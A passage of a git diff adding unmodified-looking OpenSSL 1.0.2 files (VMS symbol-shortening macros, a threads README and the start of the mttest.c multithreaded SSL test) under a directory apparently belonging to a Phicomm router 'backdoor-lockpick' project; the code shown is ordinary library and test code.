+#  define CRYPTO_get_dynlock_destroy_callback     CRYPTO_get_dynlock_destroy_cb
+#  undef CRYPTO_get_dynlock_create_callback
+#  define CRYPTO_get_dynlock_create_callback      CRYPTO_get_dynlock_create_cb
+#  undef CRYPTO_set_locked_mem_ex_functions
+#  define CRYPTO_set_locked_mem_ex_functions      CRYPTO_set_locked_mem_ex_funcs
+#  undef CRYPTO_get_locked_mem_ex_functions
+#  define CRYPTO_get_locked_mem_ex_functions      CRYPTO_get_locked_mem_ex_funcs
+
+/* Hack some long SSL/TLS names */
+#  undef SSL_CTX_set_default_verify_paths
+#  define SSL_CTX_set_default_verify_paths        SSL_CTX_set_def_verify_paths
+#  undef SSL_get_ex_data_X509_STORE_CTX_idx
+#  define SSL_get_ex_data_X509_STORE_CTX_idx      SSL_get_ex_d_X509_STORE_CTX_idx
+#  undef SSL_add_file_cert_subjects_to_stack
+#  define SSL_add_file_cert_subjects_to_stack     SSL_add_file_cert_subjs_to_stk
+#  undef SSL_add_dir_cert_subjects_to_stack
+#  define SSL_add_dir_cert_subjects_to_stack      SSL_add_dir_cert_subjs_to_stk
+#  undef SSL_CTX_use_certificate_chain_file
+#  define SSL_CTX_use_certificate_chain_file      SSL_CTX_use_cert_chain_file
+#  undef SSL_CTX_set_cert_verify_callback
+#  define SSL_CTX_set_cert_verify_callback        SSL_CTX_set_cert_verify_cb
+#  undef SSL_CTX_set_default_passwd_cb_userdata
+#  define SSL_CTX_set_default_passwd_cb_userdata  SSL_CTX_set_def_passwd_cb_ud
+#  undef SSL_COMP_get_compression_methods
+#  define SSL_COMP_get_compression_methods        SSL_COMP_get_compress_methods
+#  undef SSL_COMP_set0_compression_methods
+#  define SSL_COMP_set0_compression_methods       SSL_COMP_set0_compress_methods
+#  undef SSL_COMP_free_compression_methods
+#  define SSL_COMP_free_compression_methods       SSL_COMP_free_compress_methods
+#  undef ssl_add_clienthello_renegotiate_ext
+#  define ssl_add_clienthello_renegotiate_ext     ssl_add_clienthello_reneg_ext
+#  undef ssl_add_serverhello_renegotiate_ext
+#  define ssl_add_serverhello_renegotiate_ext     ssl_add_serverhello_reneg_ext
+#  undef ssl_parse_clienthello_renegotiate_ext
+#  define ssl_parse_clienthello_renegotiate_ext   ssl_parse_clienthello_reneg_ext
+#  undef ssl_parse_serverhello_renegotiate_ext
+#  define ssl_parse_serverhello_renegotiate_ext   ssl_parse_serverhello_reneg_ext
+#  undef SSL_srp_server_param_with_username
+#  define SSL_srp_server_param_with_username      SSL_srp_server_param_with_un
+#  undef SSL_CTX_set_srp_client_pwd_callback
+#  define SSL_CTX_set_srp_client_pwd_callback     SSL_CTX_set_srp_client_pwd_cb
+#  undef SSL_CTX_set_srp_verify_param_callback
+#  define SSL_CTX_set_srp_verify_param_callback   SSL_CTX_set_srp_vfy_param_cb
+#  undef SSL_CTX_set_srp_username_callback
+#  define SSL_CTX_set_srp_username_callback       SSL_CTX_set_srp_un_cb
+#  undef ssl_add_clienthello_use_srtp_ext
+#  define ssl_add_clienthello_use_srtp_ext        ssl_add_clihello_use_srtp_ext
+#  undef ssl_add_serverhello_use_srtp_ext
+#  define ssl_add_serverhello_use_srtp_ext        ssl_add_serhello_use_srtp_ext
+#  undef ssl_parse_clienthello_use_srtp_ext
+#  define ssl_parse_clienthello_use_srtp_ext      ssl_parse_clihello_use_srtp_ext
+#  undef ssl_parse_serverhello_use_srtp_ext
+#  define ssl_parse_serverhello_use_srtp_ext      ssl_parse_serhello_use_srtp_ext
+#  undef SSL_CTX_set_next_protos_advertised_cb
+#  define SSL_CTX_set_next_protos_advertised_cb   SSL_CTX_set_next_protos_adv_cb
+#  undef SSL_CTX_set_next_proto_select_cb
+#  define SSL_CTX_set_next_proto_select_cb        SSL_CTX_set_next_proto_sel_cb
+
+#  undef tls1_send_server_supplemental_data
+#  define tls1_send_server_supplemental_data      tls1_send_server_suppl_data
+#  undef tls1_send_client_supplemental_data
+#  define tls1_send_client_supplemental_data      tls1_send_client_suppl_data
+#  undef tls1_get_server_supplemental_data
+#  define tls1_get_server_supplemental_data       tls1_get_server_suppl_data
+#  undef tls1_get_client_supplemental_data
+#  define tls1_get_client_supplemental_data       tls1_get_client_suppl_data
+
+#  undef ssl3_cbc_record_digest_supported
+#  define ssl3_cbc_record_digest_supported        ssl3_cbc_record_digest_support
+#  undef ssl_check_clienthello_tlsext_late
+#  define ssl_check_clienthello_tlsext_late       ssl_check_clihello_tlsext_late
+#  undef ssl_check_clienthello_tlsext_early
+#  define ssl_check_clienthello_tlsext_early      ssl_check_clihello_tlsext_early
+
+/* Hack some RSA long names */
+#  undef RSA_padding_check_PKCS1_OAEP_mgf1
+#  define RSA_padding_check_PKCS1_OAEP_mgf1       RSA_pad_check_PKCS1_OAEP_mgf1
+
+/* Hack some ENGINE long names */
+#  undef ENGINE_get_default_BN_mod_exp_crt
+#  define ENGINE_get_default_BN_mod_exp_crt       ENGINE_get_def_BN_mod_exp_crt
+#  undef ENGINE_set_default_BN_mod_exp_crt
+#  define ENGINE_set_default_BN_mod_exp_crt       ENGINE_set_def_BN_mod_exp_crt
+#  undef ENGINE_set_load_privkey_function
+#  define ENGINE_set_load_privkey_function        ENGINE_set_load_privkey_fn
+#  undef ENGINE_get_load_privkey_function
+#  define ENGINE_get_load_privkey_function        ENGINE_get_load_privkey_fn
+#  undef ENGINE_unregister_pkey_asn1_meths
+#  define ENGINE_unregister_pkey_asn1_meths       ENGINE_unreg_pkey_asn1_meths
+#  undef ENGINE_register_all_pkey_asn1_meths
+#  define ENGINE_register_all_pkey_asn1_meths     ENGINE_reg_all_pkey_asn1_meths
+#  undef ENGINE_set_default_pkey_asn1_meths
+#  define ENGINE_set_default_pkey_asn1_meths      ENGINE_set_def_pkey_asn1_meths
+#  undef ENGINE_get_pkey_asn1_meth_engine
+#  define ENGINE_get_pkey_asn1_meth_engine        ENGINE_get_pkey_asn1_meth_eng
+#  undef ENGINE_set_load_ssl_client_cert_function
+#  define ENGINE_set_load_ssl_client_cert_function \
+                                                ENGINE_set_ld_ssl_clnt_cert_fn
+#  undef ENGINE_get_ssl_client_cert_function
+#  define ENGINE_get_ssl_client_cert_function     ENGINE_get_ssl_client_cert_fn
+
+/* Hack some long OCSP names */
+#  undef OCSP_REQUEST_get_ext_by_critical
+#  define OCSP_REQUEST_get_ext_by_critical        OCSP_REQUEST_get_ext_by_crit
+#  undef OCSP_BASICRESP_get_ext_by_critical
+#  define OCSP_BASICRESP_get_ext_by_critical      OCSP_BASICRESP_get_ext_by_crit
+#  undef OCSP_SINGLERESP_get_ext_by_critical
+#  define OCSP_SINGLERESP_get_ext_by_critical     OCSP_SINGLERESP_get_ext_by_crit
+
+/* Hack some long DES names */
+#  undef _ossl_old_des_ede3_cfb64_encrypt
+#  define _ossl_old_des_ede3_cfb64_encrypt        _ossl_odes_ede3_cfb64_encrypt
+#  undef _ossl_old_des_ede3_ofb64_encrypt
+#  define _ossl_old_des_ede3_ofb64_encrypt        _ossl_odes_ede3_ofb64_encrypt
+
+/* Hack some long EVP names */
+#  undef OPENSSL_add_all_algorithms_noconf
+#  define OPENSSL_add_all_algorithms_noconf       OPENSSL_add_all_algo_noconf
+#  undef OPENSSL_add_all_algorithms_conf
+#  define OPENSSL_add_all_algorithms_conf         OPENSSL_add_all_algo_conf
+#  undef EVP_PKEY_meth_set_verify_recover
+#  define EVP_PKEY_meth_set_verify_recover        EVP_PKEY_meth_set_vrfy_recover
+
+/* Hack some long EC names */
+#  undef EC_GROUP_set_point_conversion_form
+#  define EC_GROUP_set_point_conversion_form      EC_GROUP_set_point_conv_form
+#  undef EC_GROUP_get_point_conversion_form
+#  define EC_GROUP_get_point_conversion_form      EC_GROUP_get_point_conv_form
+#  undef EC_GROUP_clear_free_all_extra_data
+#  define EC_GROUP_clear_free_all_extra_data      EC_GROUP_clr_free_all_xtra_data
+#  undef EC_KEY_set_public_key_affine_coordinates
+#  define EC_KEY_set_public_key_affine_coordinates \
+                                                EC_KEY_set_pub_key_aff_coords
+#  undef EC_POINT_set_Jprojective_coordinates_GFp
+#  define EC_POINT_set_Jprojective_coordinates_GFp \
+                                                EC_POINT_set_Jproj_coords_GFp
+#  undef EC_POINT_get_Jprojective_coordinates_GFp
+#  define EC_POINT_get_Jprojective_coordinates_GFp \
+                                                EC_POINT_get_Jproj_coords_GFp
+#  undef EC_POINT_set_affine_coordinates_GFp
+#  define EC_POINT_set_affine_coordinates_GFp     EC_POINT_set_affine_coords_GFp
+#  undef EC_POINT_get_affine_coordinates_GFp
+#  define EC_POINT_get_affine_coordinates_GFp     EC_POINT_get_affine_coords_GFp
+#  undef EC_POINT_set_compressed_coordinates_GFp
+#  define EC_POINT_set_compressed_coordinates_GFp EC_POINT_set_compr_coords_GFp
+#  undef EC_POINT_set_affine_coordinates_GF2m
+#  define EC_POINT_set_affine_coordinates_GF2m    EC_POINT_set_affine_coords_GF2m
+#  undef EC_POINT_get_affine_coordinates_GF2m
+#  define EC_POINT_get_affine_coordinates_GF2m    EC_POINT_get_affine_coords_GF2m
+#  undef EC_POINT_set_compressed_coordinates_GF2m
+#  define EC_POINT_set_compressed_coordinates_GF2m \
+                                                EC_POINT_set_compr_coords_GF2m
+#  undef ec_GF2m_simple_group_clear_finish
+#  define ec_GF2m_simple_group_clear_finish       ec_GF2m_simple_grp_clr_finish
+#  undef ec_GF2m_simple_group_check_discriminant
+#  define ec_GF2m_simple_group_check_discriminant ec_GF2m_simple_grp_chk_discrim
+#  undef ec_GF2m_simple_point_clear_finish
+#  define ec_GF2m_simple_point_clear_finish       ec_GF2m_simple_pt_clr_finish
+#  undef ec_GF2m_simple_point_set_to_infinity
+#  define ec_GF2m_simple_point_set_to_infinity    ec_GF2m_simple_pt_set_to_inf
+#  undef ec_GF2m_simple_points_make_affine
+#  define ec_GF2m_simple_points_make_affine       ec_GF2m_simple_pts_make_affine
+#  undef ec_GF2m_simple_point_set_affine_coordinates
+#  define ec_GF2m_simple_point_set_affine_coordinates \
+                                                ec_GF2m_smp_pt_set_af_coords
+#  undef ec_GF2m_simple_point_get_affine_coordinates
+#  define ec_GF2m_simple_point_get_affine_coordinates \
+                                                ec_GF2m_smp_pt_get_af_coords
+#  undef ec_GF2m_simple_set_compressed_coordinates
+#  define ec_GF2m_simple_set_compressed_coordinates \
+                                                ec_GF2m_smp_set_compr_coords
+#  undef ec_GFp_simple_group_set_curve_GFp
+#  define ec_GFp_simple_group_set_curve_GFp       ec_GFp_simple_grp_set_curve_GFp
+#  undef ec_GFp_simple_group_get_curve_GFp
+#  define ec_GFp_simple_group_get_curve_GFp       ec_GFp_simple_grp_get_curve_GFp
+#  undef ec_GFp_simple_group_clear_finish
+#  define ec_GFp_simple_group_clear_finish        ec_GFp_simple_grp_clear_finish
+#  undef ec_GFp_simple_group_set_generator
+#  define ec_GFp_simple_group_set_generator       ec_GFp_simple_grp_set_generator
+#  undef ec_GFp_simple_group_get0_generator
+#  define ec_GFp_simple_group_get0_generator      ec_GFp_simple_grp_gt0_generator
+#  undef ec_GFp_simple_group_get_cofactor
+#  define ec_GFp_simple_group_get_cofactor        ec_GFp_simple_grp_get_cofactor
+#  undef ec_GFp_simple_point_clear_finish
+#  define ec_GFp_simple_point_clear_finish        ec_GFp_simple_pt_clear_finish
+#  undef ec_GFp_simple_point_set_to_infinity
+#  define ec_GFp_simple_point_set_to_infinity     ec_GFp_simple_pt_set_to_inf
+#  undef ec_GFp_simple_points_make_affine
+#  define ec_GFp_simple_points_make_affine        ec_GFp_simple_pts_make_affine
+#  undef ec_GFp_simple_set_Jprojective_coordinates_GFp
+#  define ec_GFp_simple_set_Jprojective_coordinates_GFp \
+                                                ec_GFp_smp_set_Jproj_coords_GFp
+#  undef ec_GFp_simple_get_Jprojective_coordinates_GFp
+#  define ec_GFp_simple_get_Jprojective_coordinates_GFp \
+                                                ec_GFp_smp_get_Jproj_coords_GFp
+#  undef ec_GFp_simple_point_set_affine_coordinates_GFp
+#  define ec_GFp_simple_point_set_affine_coordinates_GFp \
+                                                ec_GFp_smp_pt_set_af_coords_GFp
+#  undef ec_GFp_simple_point_get_affine_coordinates_GFp
+#  define ec_GFp_simple_point_get_affine_coordinates_GFp \
+                                                ec_GFp_smp_pt_get_af_coords_GFp
+#  undef ec_GFp_simple_set_compressed_coordinates_GFp
+#  define ec_GFp_simple_set_compressed_coordinates_GFp \
+                                                ec_GFp_smp_set_compr_coords_GFp
+#  undef ec_GFp_simple_point_set_affine_coordinates
+#  define ec_GFp_simple_point_set_affine_coordinates \
+                                                ec_GFp_smp_pt_set_af_coords
+#  undef ec_GFp_simple_point_get_affine_coordinates
+#  define ec_GFp_simple_point_get_affine_coordinates \
+                                                ec_GFp_smp_pt_get_af_coords
+#  undef ec_GFp_simple_set_compressed_coordinates
+#  define ec_GFp_simple_set_compressed_coordinates \
+                                                ec_GFp_smp_set_compr_coords
+#  undef ec_GFp_simple_group_check_discriminant
+#  define ec_GFp_simple_group_check_discriminant  ec_GFp_simple_grp_chk_discrim
+
+/* Hack som long STORE names */
+#  undef STORE_method_set_initialise_function
+#  define STORE_method_set_initialise_function    STORE_meth_set_initialise_fn
+#  undef STORE_method_set_cleanup_function
+#  define STORE_method_set_cleanup_function       STORE_meth_set_cleanup_fn
+#  undef STORE_method_set_generate_function
+#  define STORE_method_set_generate_function      STORE_meth_set_generate_fn
+#  undef STORE_method_set_modify_function
+#  define STORE_method_set_modify_function        STORE_meth_set_modify_fn
+#  undef STORE_method_set_revoke_function
+#  define STORE_method_set_revoke_function        STORE_meth_set_revoke_fn
+#  undef STORE_method_set_delete_function
+#  define STORE_method_set_delete_function        STORE_meth_set_delete_fn
+#  undef STORE_method_set_list_start_function
+#  define STORE_method_set_list_start_function    STORE_meth_set_list_start_fn
+#  undef STORE_method_set_list_next_function
+#  define STORE_method_set_list_next_function     STORE_meth_set_list_next_fn
+#  undef STORE_method_set_list_end_function
+#  define STORE_method_set_list_end_function      STORE_meth_set_list_end_fn
+#  undef STORE_method_set_update_store_function
+#  define STORE_method_set_update_store_function  STORE_meth_set_update_store_fn
+#  undef STORE_method_set_lock_store_function
+#  define STORE_method_set_lock_store_function    STORE_meth_set_lock_store_fn
+#  undef STORE_method_set_unlock_store_function
+#  define STORE_method_set_unlock_store_function  STORE_meth_set_unlock_store_fn
+#  undef STORE_method_get_initialise_function
+#  define STORE_method_get_initialise_function    STORE_meth_get_initialise_fn
+#  undef STORE_method_get_cleanup_function
+#  define STORE_method_get_cleanup_function       STORE_meth_get_cleanup_fn
+#  undef STORE_method_get_generate_function
+#  define STORE_method_get_generate_function      STORE_meth_get_generate_fn
+#  undef STORE_method_get_modify_function
+#  define STORE_method_get_modify_function        STORE_meth_get_modify_fn
+#  undef STORE_method_get_revoke_function
+#  define STORE_method_get_revoke_function        STORE_meth_get_revoke_fn
+#  undef STORE_method_get_delete_function
+#  define STORE_method_get_delete_function        STORE_meth_get_delete_fn
+#  undef STORE_method_get_list_start_function
+#  define STORE_method_get_list_start_function    STORE_meth_get_list_start_fn
+#  undef STORE_method_get_list_next_function
+#  define STORE_method_get_list_next_function     STORE_meth_get_list_next_fn
+#  undef STORE_method_get_list_end_function
+#  define STORE_method_get_list_end_function      STORE_meth_get_list_end_fn
+#  undef STORE_method_get_update_store_function
+#  define STORE_method_get_update_store_function  STORE_meth_get_update_store_fn
+#  undef STORE_method_get_lock_store_function
+#  define STORE_method_get_lock_store_function    STORE_meth_get_lock_store_fn
+#  undef STORE_method_get_unlock_store_function
+#  define STORE_method_get_unlock_store_function  STORE_meth_get_unlock_store_fn
+
+/* Hack some long TS names */
+#  undef TS_RESP_CTX_set_status_info_cond
+#  define TS_RESP_CTX_set_status_info_cond        TS_RESP_CTX_set_stat_info_cond
+#  undef TS_RESP_CTX_set_clock_precision_digits
+#  define TS_RESP_CTX_set_clock_precision_digits  TS_RESP_CTX_set_clk_prec_digits
+#  undef TS_CONF_set_clock_precision_digits
+#  define TS_CONF_set_clock_precision_digits      TS_CONF_set_clk_prec_digits
+
+/* Hack some long CMS names */
+#  undef CMS_RecipientInfo_ktri_get0_algs
+#  define CMS_RecipientInfo_ktri_get0_algs        CMS_RecipInfo_ktri_get0_algs
+#  undef CMS_RecipientInfo_ktri_get0_signer_id
+#  define CMS_RecipientInfo_ktri_get0_signer_id   CMS_RecipInfo_ktri_get0_sigr_id
+#  undef CMS_OtherRevocationInfoFormat_it
+#  define CMS_OtherRevocationInfoFormat_it        CMS_OtherRevocInfoFormat_it
+#  undef CMS_KeyAgreeRecipientIdentifier_it
+#  define CMS_KeyAgreeRecipientIdentifier_it      CMS_KeyAgreeRecipIdentifier_it
+#  undef CMS_OriginatorIdentifierOrKey_it
+#  define CMS_OriginatorIdentifierOrKey_it        CMS_OriginatorIdOrKey_it
+#  undef cms_SignerIdentifier_get0_signer_id
+#  define cms_SignerIdentifier_get0_signer_id     cms_SignerId_get0_signer_id
+#  undef CMS_RecipientInfo_kari_get0_orig_id
+#  define CMS_RecipientInfo_kari_get0_orig_id     CMS_RecipInfo_kari_get0_orig_id
+#  undef CMS_RecipientInfo_kari_get0_reks
+#  define CMS_RecipientInfo_kari_get0_reks        CMS_RecipInfo_kari_get0_reks
+#  undef CMS_RecipientEncryptedKey_cert_cmp
+#  define CMS_RecipientEncryptedKey_cert_cmp      CMS_RecipEncryptedKey_cert_cmp
+#  undef CMS_RecipientInfo_kari_set0_pkey
+#  define CMS_RecipientInfo_kari_set0_pkey        CMS_RecipInfo_kari_set0_pkey
+#  undef CMS_RecipientEncryptedKey_get0_id
+#  define CMS_RecipientEncryptedKey_get0_id       CMS_RecipEncryptedKey_get0_id
+#  undef CMS_RecipientInfo_kari_orig_id_cmp
+#  define CMS_RecipientInfo_kari_orig_id_cmp      CMS_RecipInfo_kari_orig_id_cmp
+
+/* Hack some long DTLS1 names */
+#  undef dtls1_retransmit_buffered_messages
+#  define dtls1_retransmit_buffered_messages      dtls1_retransmit_buffered_msgs
+
+/* Hack some long SRP names */
+#  undef SRP_generate_server_master_secret
+#  define SRP_generate_server_master_secret       SRP_gen_server_master_secret
+#  undef SRP_generate_client_master_secret
+#  define SRP_generate_client_master_secret       SRP_gen_client_master_secret
+
+/* Hack some long UI names */
+#  undef UI_method_get_prompt_constructor
+#  define UI_method_get_prompt_constructor        UI_method_get_prompt_constructr
+#  undef UI_method_set_prompt_constructor
+#  define UI_method_set_prompt_constructor        UI_method_set_prompt_constructr
+
+# endif                         /* defined OPENSSL_SYS_VMS */
+
+/* Case insensitive linking causes problems.... */
+# if defined(OPENSSL_SYS_VMS) || defined(OPENSSL_SYS_OS2)
+#  undef ERR_load_CRYPTO_strings
+#  define ERR_load_CRYPTO_strings                 ERR_load_CRYPTOlib_strings
+#  undef OCSP_crlID_new
+#  define OCSP_crlID_new                          OCSP_crlID2_new
+
+#  undef d2i_ECPARAMETERS
+#  define d2i_ECPARAMETERS                        d2i_UC_ECPARAMETERS
+#  undef i2d_ECPARAMETERS
+#  define i2d_ECPARAMETERS                        i2d_UC_ECPARAMETERS
+#  undef d2i_ECPKPARAMETERS
+#  define d2i_ECPKPARAMETERS                      d2i_UC_ECPKPARAMETERS
+#  undef i2d_ECPKPARAMETERS
+#  define i2d_ECPKPARAMETERS                      i2d_UC_ECPKPARAMETERS
+
+/*
+ * These functions do not seem to exist! However, I'm paranoid... Original
+ * command in x509v3.h: These functions are being redefined in another
+ * directory, and clash when the linker is case-insensitive, so let's hide
+ * them a little, by giving them an extra 'o' at the beginning of the name...
+ */
+#  undef X509v3_cleanup_extensions
+#  define X509v3_cleanup_extensions               oX509v3_cleanup_extensions
+#  undef X509v3_add_extension
+#  define X509v3_add_extension                    oX509v3_add_extension
+#  undef X509v3_add_netscape_extensions
+#  define X509v3_add_netscape_extensions          oX509v3_add_netscape_extensions
+#  undef X509v3_add_standard_extensions
+#  define X509v3_add_standard_extensions          oX509v3_add_standard_extensions
+
+/* This one clashes with CMS_data_create */
+#  undef cms_Data_create
+#  define cms_Data_create                         priv_cms_Data_create
+
+# endif
+
+#endif                          /* ! defined HEADER_VMS_IDHACKS_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/README
new file mode 100644
index 0000000..df6b26e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/README
@@ -0,0 +1,14 @@
+Mutithreading testing area.
+
+Since this stuff is very very platorm specific, this is not part of the
+normal build.  Have a read of doc/threads.doc.
+
+mttest will do some testing and will currently build under Windows NT/95,
+Solaris and Linux.  The IRIX stuff is not finished.
+
+I have tested this program on a 12 CPU ultra sparc box (solaris 2.5.1)
+and things seem to work ok.
+
+The Linux pthreads package can be retrieved from 
+http://www.mit.edu:8001/people/proven/pthreads.html
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/mttest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/mttest.c
new file mode 100644
index 0000000..8f67db6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/mttest.c
@@ -0,0 +1,1208 @@
+/* crypto/threads/mttest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <errno.h>
+#ifdef LINUX
+# include <typedefs.h>
+#endif
+#ifdef OPENSSL_SYS_WIN32
+# include <windows.h>
+#endif
+#ifdef SOLARIS
+# include <synch.h>
+# include <thread.h>
+#endif
+#ifdef IRIX
+# include <ulocks.h>
+# include <sys/prctl.h>
+#endif
+#ifdef PTHREADS
+# include <pthread.h>
+#endif
+#ifdef OPENSSL_SYS_NETWARE
+# if !defined __int64
+#  define __int64 long long
+# endif
+# include <nwmpk.h>
+#endif
+#include <openssl/lhash.h>
+#include <openssl/crypto.h>
+#include <openssl/buffer.h>
+#include "../../e_os.h"
+#include <openssl/x509.h>
+#include <openssl/ssl.h>
+#include <openssl/err.h>
+#include <openssl/rand.h>
+
+#ifdef OPENSSL_NO_FP_API
+# define APPS_WIN16
+# include "../buffer/bss_file.c"
+#endif
+
+#ifdef OPENSSL_SYS_NETWARE
+# define TEST_SERVER_CERT "/openssl/apps/server.pem"
+# define TEST_CLIENT_CERT "/openssl/apps/client.pem"
+#else
+# define TEST_SERVER_CERT "../../apps/server.pem"
+# define TEST_CLIENT_CERT "../../apps/client.pem"
+#endif
+
+#define MAX_THREAD_NUMBER       100
+
+int MS_CALLBACK verify_callback(int ok, X509_STORE_CTX *xs);
+void thread_setup(void);
+void thread_cleanup(void);
+void do_threads(SSL_CTX *s_ctx, SSL_CTX *c_ctx);
+
+void irix_locking_callback(int mode, int type, char *file, int line);
+void solaris_locking_callback(int mode, int type, char *file, int line);
+void win32_locking_callback(int mode, int type, char *file, int line);
+void pthreads_locking_callback(int mode, int type, char *file, int line);
+void netware_locking_callback(int mode, int type, char *file, int line);
+void beos_locking_callback(int mode, int type, const char *file, int line);
+
+unsigned long irix_thread_id(void);
+unsigned long solaris_thread_id(void);
+unsigned long pthreads_thread_id(void);
+unsigned long netware_thread_id(void);
+unsigned long beos_thread_id(void);
+
+#if defined(OPENSSL_SYS_NETWARE)
+static MPKMutex *lock_cs;
+static MPKSema ThreadSem;
+static long *lock_count;
+#endif
+
+BIO *bio_err = NULL;
+BIO *bio_stdout = NULL;
+
+static char *cipher = NULL;
+int verbose = 0;
+#ifdef FIONBIO
+static int s_nbio = 0;
+#endif
+
+int thread_number = 10;
+int number_of_loops = 10;
+int reconnect = 0;
+int cache_stats = 0;
+
+static const char rnd_seed[] =
+    "string to make the random number generator think it has entropy";
+
+int doit(char *ctx[4]);
+static void print_stats(FILE *fp, SSL_CTX *ctx)
+{
+    fprintf(fp, "%4ld items in the session cache\n",
+            SSL_CTX_sess_number(ctx));
+    fprintf(fp, "%4d client connects (SSL_connect())\n",
+            SSL_CTX_sess_connect(ctx));
+    fprintf(fp, "%4d client connects that finished\n",
+            SSL_CTX_sess_connect_good(ctx));
+    fprintf(fp, "%4d server connects (SSL_accept())\n",
+            SSL_CTX_sess_accept(ctx));
+    fprintf(fp, "%4d server connects that finished\n",
+            SSL_CTX_sess_accept_good(ctx));
+    fprintf(fp, "%4d session cache hits\n", SSL_CTX_sess_hits(ctx));
+    fprintf(fp, "%4d session cache misses\n", SSL_CTX_sess_misses(ctx));
+    fprintf(fp, "%4d session cache timeouts\n", SSL_CTX_sess_timeouts(ctx));
+}
+
+static void sv_usage(void)
+{
+    fprintf(stderr, "usage: ssltest [args ...]\n");
+    fprintf(stderr, "\n");
+    fprintf(stderr, " -server_auth  - check server certificate\n");
+    fprintf(stderr, " -client_auth  - do client authentication\n");
+    fprintf(stderr, " -v            - more output\n");
+    fprintf(stderr, " -CApath arg   - PEM format directory of CA's\n");
+    fprintf(stderr, " -CAfile arg   - PEM format file of CA's\n");
+    fprintf(stderr, " -threads arg  - number of threads\n");
+    fprintf(stderr, " -loops arg    - number of 'connections', per thread\n");
+    fprintf(stderr, " -reconnect    - reuse session-id's\n");
+    fprintf(stderr, " -stats        - server session-id cache stats\n");
+    fprintf(stderr, " -cert arg     - server certificate/key\n");
+    fprintf(stderr, " -ccert arg    - client certificate/key\n");
+    fprintf(stderr, " -ssl3         - just SSLv3n\n");
+}
+
+int main(int argc, char *argv[])
+{
+    char *CApath = NULL, *CAfile = NULL;
+    int badop = 0;
+    int ret = 1;
+    int client_auth = 0;
+    int server_auth = 0;
+    SSL_CTX *s_ctx = NULL;
+    SSL_CTX *c_ctx = NULL;
+    char *scert = TEST_SERVER_CERT;
+    char *ccert = TEST_CLIENT_CERT;
+    SSL_METHOD *ssl_method = SSLv23_method();
+
+    RAND_seed(rnd_seed, sizeof rnd_seed);
+
+    if (bio_err == NULL)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+    if (bio_stdout == NULL)
+        bio_stdout = BIO_new_fp(stdout, BIO_NOCLOSE);
+    argc--;
+    argv++;
+
+    while (argc >= 1) {
+        if (strcmp(*argv, "-server_auth") == 0)
+            server_auth = 1;
+        else if (strcmp(*argv, "-client_auth") == 0)
+            client_auth = 1;
+        else if (strcmp(*argv, "-reconnect") == 0)
+            reconnect = 1;
+        else if (strcmp(*argv, "-stats") == 0)
+            cache_stats = 1;
+        else if (strcmp(*argv, "-ssl3") == 0)
+            ssl_method = SSLv3_method();
+        else if (strcmp(*argv, "-ssl2") == 0)
+            ssl_method = SSLv2_method();
+        else if (strcmp(*argv, "-CApath") == 0) {
+            if (--argc < 1)
+                goto bad;
+            CApath = *(++argv);
+        } else if (strcmp(*argv, "-CAfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            CAfile = *(++argv);
+        } else if (strcmp(*argv, "-cert") == 0) {
+            if (--argc < 1)
+                goto bad;
+            scert = *(++argv);
